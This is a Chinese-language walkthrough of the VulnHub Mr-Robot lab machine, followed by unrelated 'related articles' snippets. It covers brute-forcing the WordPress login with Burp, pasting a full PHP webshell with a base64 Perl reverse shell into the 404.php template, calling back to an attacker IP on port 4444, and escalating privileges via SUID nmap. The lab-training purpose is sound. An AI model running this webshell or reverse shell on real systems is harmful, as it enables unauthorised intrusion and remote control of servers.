靶场练习第七天~vulnhub靶场之mrRobot

靶机下载链接: 百度网盘 请输入提取码 提取码: sqv3

一、主机发现

1.用ifconfig查看kali的ip,因为kali和靶机都开启了NAT模式,使用namp -sP 192.168.101.0/24探测靶机ip

二、信息收集

1.使用nmap扫描靶机

使用nmap -A 192.168.101.108 ,查看靶机开放的端口与服务。

2.使用dirb命令扫描靶机网站

用dirb命令扫描靶机网站,看看有没有隐藏的网址或者配置文件,具体使用方法:dirb http://192.168.101.108

三、利用找到的信息,进行渗透

1.利用找到的网站寻找有用的信息

(1)扫描到一下可能有用的网站,先看http://192.168.101.108/robots这个网站,一般这里会写哪些文件能不能爬虫

一个txt文件,直接访问这个txt文件,发现了第一个flag

2.字典爆破

访问http://192.168.101.108/robots另外一个文件fsocity.dic

打开刚才的文件发现是一个类似字典的文件将获取到的字典排序

刚才收集的网址里面有个http://192.168.101.108/wp-login.php,可能会用上字典

设置好火狐浏览器的Foxyproxy插件,自动启用

启用kali的brup suite抓包工具,具体操作如下:

抓包工具设置完成后,在用户密码那里随便写点东西

自动弹出,如下所示页面,则抓到包了。

点击右键将数据包发送给 intruder

选择cluster bomb模式,添加用户和密码两个参数

将刚才排序好的字典导入两个参数中

字典添加完成后,点击start attack,开始跑字典,由于字典较长需要跑久一点看到

一个length数值不一样的就是正确的用户密码

接着尝试用爆破出来的用户密码登录一下该网站,结果成功登录到后台

3.利用wp-admin网站后台上传webshell

(1)修改404.php将webshell.php上传

找到404.php,将webshell.php源码粘贴到里面

webshell源码

<?php

function which($pr) {

$path = execute("which $pr");

return ($path ? $path : $pr);

}

function execute($cfe) {

$res = '';

if ($cfe) {

if(function_exists('exec')) {

@exec($cfe,$res);

$res = join("\n",$res);

} elseif(function_exists('shell_exec')) {

$res = @shell_exec($cfe);

} elseif(function_exists('system')) {

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(function_exists('passthru')) {

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(@is_resource($f = @popen($cfe,"r"))) {

$res = '';

while(!@feof($f)) {

$res .= @fread($f,1024);

}

@pclose($f);

}

}

return $res;

}

function cf($fname,$text){

if($fp=@fopen($fname,'w')) {

@fputs($fp,@base64_decode($text));

@fclose($fp);

}

}

$yourip = "192.168.101.10";

$yourport = '4444';

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

之后,先开启监听:nc -lvvp 4444 ,直接访问404.php

访问之后,反向链接到kali

4.渗透

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

(1)查看/home目录有没有flag

发现一个txt文件但是没有robot的密码,在robot目录里面还有一个pasword开头的文件还是md5加密的

解密该字符串

查看刚才的那个key文件,发现flag

(2)SUID提权

1.查看具有的SUID的二进制可执行文件:find / -user root -perm -4000 -print 2>/dev/null

2.已知的可用来提权的linux可行性文件列表如下:nmap、vim、find、bash、more、less、nano、cp

3.进入nmap交互模式,(仅限2.02-5.21版本):nmap --interactive

4.提权root:! sh

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375066.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

JAVA第二次试验

北京电子科技学院&#xff08;BESTI&#xff09; 实 验 报 告 课程&#xff1a;Java程序设计 班级&#xff1a;1352 姓名&#xff1a;潘俊洋 学号&#xff1a;20135230 成绩&#xff1a; 指导教师:娄嘉鹏 实验日期:2015.5.4 实验密级&#xff1a…

【转】怎么样从一个疯狂下载者成为一个学习者!!!值得反省下的问题·~~

为了方便广大网友&#xff0c;各种网站也应运而生。当网络的建设和发展正进行的如火如荼&#xff0c;喧闹之中&#xff0c;搭配学习这壶美酒的&#xff0c;竟是一瓶名叫资料下载的毒药&#xff0c;更糟糕的是&#xff0c;美酒和毒药已经被灌到了同一个杯子里&#xff0c;浑然一…

靶场练习第八天~vulnhub靶场之CH4INRULZ_v1.0.1

一、前期准备 1.靶机下载 链接: 百度网盘 请输入提取码 提取码: z37y 2.用命令ifconfig查看kali 二、信息收集 1.主机发现&#xff0c;使用nmap命令 具体使用方法&#xff1a;nmap -sP 192.168.101.0/24 2.查看该靶机开放了哪些端口 nmap -A 192.168.101.109 直接访问80端…

C# 不支持关键字: “.;database”。

解决方案分析:这个一定是链接字符串有问题&#xff0c;核对web.config 和程序的字符串是否有误转载于:https://www.cnblogs.com/louby/p/5208986.html

TImus 1073 Square Country DP

题意&#xff1a;给出一个数n(1<n<60000),这个数可以写成一些数的平方的和&#xff0c; 问对于n&#xff0c;最少可以分成多少个数的平方的和。 比如&#xff1a;n344&#xff0c;则34418*184*42*2&#xff0c;输出3. dp[i]表示i这个数最少可以分成多少个数的平方的和。 …

vulnhub靶机获取不到ip

1.启动靶机&#xff0c;出现如下图所示&#xff0c;按e 2.进入如下图所示时&#xff0c;将ro 替换为 rw signie init/bin/bash 3.按下Ctrl键X键&#xff0c;重启服务进入如下界面 4.查看当前网卡IP信息 ip a 5.编辑网卡配置文件vi /etc/network/interfaces 6.发现网卡名字与刚…

apache整合tomcat部署集群

近日&#xff0c;由于公司项目需要&#xff0c;所以学习了apache整合tomcat以及集群的一些知识。 所以做下笔记日后回顾可以用到。 apache只有处理静态事物的能力&#xff0c; 而tomcat的强项就是处理动态的请求&#xff0c;所以apache和tomcat整合相互取长补短&#xff0c;由a…

Cpk

CPK&#xff1a;Complex Process Capability index 的缩写&#xff0c;是现代企业用于表示制程能力的指标。制程能力是过程性能的允许最大变化范围与过程的正常偏差的比值。制程能力研究在於确认这些特性符合规格的程度&#xff0c;以保证制程成品不符规格的不良率在要求的水准…

靶场练习第九天~vulnhub靶场之dc-1

一、环境搭建 靶场下载链接: 百度网盘 请输入提取码 提取码: ih67 1.查看kali的ip&#xff1a;ifconfig 二、信息收集 1.使用namp命令 主机探测: nmap -sP 192.168.101.0/24 查看靶机开放端口号和服务:nmap -A 192.168.101.111 发现开放80端口,访问一下192.168.101.111 Dru…

4~20mA模拟输出(电流环)应用笔记(转)

4~20mA模拟输出&#xff08;电流环&#xff09;应用笔记 bpesun163.com 前言 4-20mA.DC(1-5V.DC)信号制是国际电工委员会(IEC):过程控制系统用模拟信号标准。 在工业现场&#xff0c;如果采集的信号经调理后是电压信号并且进行长线传输&#xff0c;会产生以下问题&#xff1a; …

ADO多线程数据库查询

ADO多线程数据库查询通常会出现3个问题&#xff1a;1、CoInitialize 没有调用 &#xff08;CoInitialize was not called&#xff09;&#xff1b;所以&#xff0c;在使用任何dbGo对象前&#xff0c;必须手 调用CoInitialize和CoUninitialize。调用CoInitialize失败会产生"…

PHPExcel

excel文档处理对象主要用来管理我们的excel文档&#xff0c;怎么来管理&#xff08;通过属性和方法来管理&#xff09;&#xff1f;大家知道&#xff0c;类主要是由属性和方法来组成&#xff0c;通过php程序的手段来管理excel文档&#xff0c;其实就是通过本对象的属性和方法来…

靶场练习第十天~vulnhub靶场之dc-2

一、准备工作 靶机下载地址链接: 百度网盘 请输入提取码 提取码: ib86 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;使用nmap 192.168.101.0/24&#xff0c;发现靶机地址为192.168.101.115 &#xff08;2&#xff09;对靶机做进一步探测&#xff0c;发现靶机开…

Ubuntu 14.10 创建虚拟网卡实现桥接网络

目标需求&#xff1a;在Ubuntu主机创建一张虚拟网卡&#xff0c;使得搭建在VirtualBox中的其他主机能借助虚拟网卡构建的局域网进行相互间的通讯 步骤一&#xff1a;准备工具包 安装 uml-utilities 以及 bridge-utils sudo apt-get install uml-utilities bridge-utils 步骤二&…

iOS定时器-- NSTimer 和CADisplaylink

iOS定时器-- NSTimer 和CADisplaylink 一、iOS中有两种不同的定时器&#xff1a; 1. NSTimer&#xff08;时间间隔可以任意设定&#xff0c;最小0.1ms&#xff09;// If seconds is less than or equal to 0.0, this method chooses the nonnegative value of 0.1 millisecond…

靶场练习第十一天~vulnhub靶场之dc-3

一、准备工作 1.靶场链接: 百度网盘 请输入提取码 提取码: 48d3 2.启动靶场后会遇到如下情况&#xff1a; 2-1具体解决办法如下&#xff1a; 启动成功 3.查看kali的ip&#xff1a;ifconfig 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;寻找靶机的ip&#xf…

UNIX环境高级编程一书中apue.h找不到

apue.h是作者为了方便自己写的一个库&#xff0c;在http://www.apuebook.com选择你对应书中的source code&#xff0c;然后解压压缩包中在/include/apue.h以及/lib/error.c复制到你文件系统中/usr/include中即可。另外在apue.h中#include "error.c"即可。这样gcc编译…

大龄程序员怎样渡过中年危机?(转)

大龄程序员怎样渡过中年危机&#xff1f; 作者前言&#xff1a; 话说再有十几天就进入2016年了&#xff0c;想到这&#xff0c;我不由得五味杂陈。2016年对我来说是一个特殊的年份&#xff0c;因为我即将40岁了&#xff0c;人生正式告别青年期&#xff0c;进入中年了。 在娱乐圈…

靶场练习第十二天~vulnhub靶场之dc-4

一、准备工作 1.靶机下载链接 链接: 百度网盘 请输入提取码 提取码: 3hq4 2.用ifconfig查看kali的ip 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;主机发现 命令&#xff1a;nmap 192.168.101.0/24 &#xff08;2&#xff09;扫描靶机详细信息 发现主机 192…

网络命令-nc(二)

继续Netcat 这个命令吧 1&#xff1a;远程拷贝文件 在本地输出 文件debian.img 到 192.168.5.40 主机12345端口监听 nc -v 192.168.5.40 12345 < debian.img 在192.168.5.40 主机12345端口监听&#xff0c;将文件指定为debian-copy.img nc -l -v 12345 > debian-copy.im…